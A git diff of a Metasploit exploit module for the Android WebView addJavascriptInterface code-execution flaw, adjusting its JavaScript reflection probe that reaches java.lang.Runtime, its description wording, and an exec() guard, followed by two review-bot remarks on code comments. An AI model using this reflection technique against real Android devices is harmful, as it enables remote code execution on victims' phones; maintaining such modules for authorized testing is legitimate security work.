diff --git a/modules/exploits/android/browser/webview_addjavascriptinterface.rb b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
index 315379790a..dd11132c36 100644
--- a/modules/exploits/android/browser/webview_addjavascriptinterface.rb
+++ b/modules/exploits/android/browser/webview_addjavascriptinterface.rb
@@ -18,7 +18,7 @@ class Metasploit3 < Msf::Exploit::Remote
 :vuln_test => %Q|
 for (i in top) {
 try {
- top[i].getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
+ top[i].getClass().forName('java.lang.Runtime');
 is_vuln = true; break;
 } catch(e) {}
 }
@@ -27,7 +27,7 @@ class Metasploit3 < Msf::Exploit::Remote
 def initialize(info = {})
 super(update_info(info,
- 'Name' => 'Android < 4.2 Browser/WebView addJavascriptInterface Code Execution',
+ 'Name' => 'Android < 4.2 Browser & WebView addJavascriptInterface Code Execution',
 'Description' => %q{
 This module exploits a privilege escalation issue that arises when untrusted Javascript code is executed by an Android WebView component that has one or more
@@ -36,7 +36,7 @@ class Metasploit3 < Msf::Exploit::Remote
 Some distributions of the Android Browser app have an addJavascriptInterface call tacked on, and thus are vulnerable to RCE. The Browser app in the Google APIs
- 4.1.2 release of Android is known to work.
+ 4.1.2 release of Android is known to be vulnerable.
 A secondary attack vector involves the WebViews embedded inside a large number of Android applications. Ad integrations are perhaps the worst offender here.
@@ -80,7 +80,7 @@ class Metasploit3 < Msf::Exploit::Remote
 %Q|
 function exec(obj) {
 // ensure that the object contains a native interface
- try { obj.getClass().getName(); } catch(e) { return; }
+ try { obj.getClass().forName('java.lang.Runtime'); } catch(e) { return; }
 // get the runtime so we can exec
 var m = obj.getClass().forName('java.lang.Runtime').getMethod('getRuntime', null);
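Review bot: The relaxed probe in `:vuln_test` (first hunk) carries no comment saying what it now establishes: a target is marked `is_vuln` as soon as `forName('java.lang.Runtime')` returns without throwing, where the old line also required the `getRuntime` lookup to succeed. The same expression is repeated in the `exec(obj)` guard in the last hunk, and nothing on the page says the two copies are meant to stay identical. I would add a Ruby comment above the key, for example `# vuln_test: true when any property of top exposes Java reflection (getClass/forName)`. Because the surrounding `catch(e) {}` is empty, any unrelated exception also reads as "not vulnerable", which that comment could state. The enclosing `autopwn_info` call starts and ends outside the hunk.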
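Review bot: In the last hunk the comment `// ensure that the object contains a native interface` no longer describes the guard beneath it, which now returns early unless `obj.getClass().forName('java.lang.Runtime')` succeeds. It was accurate for the removed `getName()` call but understates the new check; something like `// skip objects that are not bridged Java objects or cannot resolve java.lang.Runtime` would match the code. The statement after the guard repeats the same `forName` lookup, so the reader sees the expression twice with no note on why. `exec` continues past the end of the hunk, so the rest of the function is not visible here.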